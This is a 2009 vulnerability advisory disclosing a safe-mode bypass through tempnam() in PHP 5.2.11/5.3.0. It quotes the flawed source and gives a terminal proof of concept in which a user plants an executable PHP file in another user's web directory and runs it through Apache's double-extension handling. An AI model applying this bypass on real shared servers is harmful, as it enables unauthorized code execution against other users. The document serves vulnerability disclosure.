|
Advisory Content :
[ PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass ]
Author: Grzegorz Stachowiak
Date:
- - Dis.: 23.09.2009
- - Pub.: 29.09.2009
Risk: Medium
Affected Software:
- - PHP 5.2.11 and prior
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.
http://lu2.php.net/manual/en/function.tempnam.php
- --- 1. PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass ---
The main problem exist in function tempnam() which check only open_basedir
value. We can create any file with PHP code, in any writable folder.
- ---ext/standard/file.c---
PHP_FUNCTION(tempnam)
{
char *dir, *prefix;
int dir_len, prefix_len;
size_t p_len;
char *opened_path;
char *p;
int fd;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &dir, &dir_len,
&prefix, &prefix_len) == FAILURE) {
return;
}
if (php_check_open_basedir(dir TSRMLS_CC)) { [1]
RETURN_FALSE;
}
php_basename(prefix, prefix_len, NULL, 0, &p, &p_len TSRMLS_CC);
if (p_len > 64) {
p[63] = '\0';
}
if ((fd = php_open_temporary_fd(dir, p, &opened_path TSRMLS_CC)) >= 0) {
close(fd);
RETVAL_STRING(opened_path, 0);
}
efree(p);
}
- ---ext/standard/file.c---
[1]. Function tempnam() check only open_basedir value.
- ---example0 (5.2.11/5.3.0)---
x@x-desktop:/var/www/bypass# php -v
PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies
|----------------------------------------------------------------|
x@x-desktop:/var/www/bypass# php -r "echo ini_get('safe_mode')"
1
|----------------------------------------------------------------|
y@x-desktop:~/www$ ls -la
total 8
drwxrwxrwx 2 y y 4096 2009-09-27 19:11 .
drwxr-xr-x 9 y y 4096 2009-09-27 19:11 ..
x@x-desktop:/var/www/bypass$ id
uid=1000(x) gid=1000(x)
|----------------------------------------------------------------|
x@x-desktop:/var/www/bypass$ php -r
"fopen('/home/y/www/safe_mode_bypass.php','a+');"
1
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is
1000 is not allowed to access /home/y/www/ owned by uid 1001 in Command
line code on line 1
Warning: fopen(/home/y/www/safe_mode_bypass.php): failed to open stream: No
such file or directory in Command line code on line 1
|----------------------------------------------------------------|
x@x-desktop:/var/www/bypass$ php -r
"tempnam('/home/y/www/','safe_mode_bypass.php.');"
x@x-desktop:/var/www/bypass$ ls -la /home/y/www/
total 8
drwxrwxrwx 2 y y 4096 2009-09-27 19:15 .
drwxr-xr-x 9 y y 4096 2009-09-27 19:11 ..
-rw------- 1 x x 0 2009-09-27 19:15 safe_mode_bypass.php.SUT2N3
|----------------------------------------------------------------|
x@x-desktop:/var/www/bypass$ php -r
"file_put_contents('/home/y/www/safe_mode_bypass.php.SUT2Nb','<?php echo
getcwd(); ?>');"
x@x-desktop:/var/www/bypass$ cat /home/y/www/safe_mode_bypass.php.SUT2Nb
<?php echo getcwd(); ?>
|----------------------------------------------------------------|
x@x-desktop:/var/www/bypass$ php -r
"chmod('/home/y/www/safe_mode_bypass.php.SUT2Nb',0755);"
x@x-desktop:/var/www$ curl http://localhost/safe_mode_bypass.php.SUT2Nb
/home/y/www
|----------------------------------------------------------------|
File has been executed as PHP file, because extension .SUT2Nb do not exist,
so Apache "search" other extension in filename, in this instance .php .
- --- 3. Contact ---
Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl
References :
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log
|
推荐
评论(0条)
